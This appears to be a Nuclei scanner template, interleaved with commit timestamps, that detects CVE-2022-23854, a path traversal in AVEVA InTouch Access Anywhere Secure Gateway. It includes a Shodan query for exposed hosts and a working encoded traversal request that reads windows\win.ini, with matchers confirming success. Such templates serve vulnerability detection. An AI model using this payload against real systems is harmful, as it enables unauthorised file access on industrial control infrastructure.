2022-09-12 08:32:07 +00:00
id : CVE-2022-23854
info :
name : AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal
author : For3stCo1d
severity : high
description : |
AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).
reference :
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
2022-09-12 09:18:08 +00:00
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
2022-12-29 13:15:38 +00:00
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
2022-09-12 08:32:07 +00:00
classification :
2023-01-05 11:21:19 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-09-12 08:32:07 +00:00
cve-id : CVE-2022-23854
2023-01-05 11:21:19 +00:00
cwe-id : CWE-23
2022-09-12 08:32:07 +00:00
metadata :
shodan-query : http.html:"InTouch Access Anywhere"
2022-12-29 13:15:38 +00:00
verified : "true"
2022-09-12 11:34:28 +00:00
tags : lfi,packetstorm,cve,cve2022,aveva,intouch
2022-09-12 08:32:07 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"
matchers-condition : and
matchers :
- type : word
words :
- 'for 16-bit app support'
- 'extensions'
2022-09-12 10:45:12 +00:00
condition : and
2022-09-12 08:32:07 +00:00
- type : word
part : header
words :
- EricomSecureGateway
- type : status
status :
- 200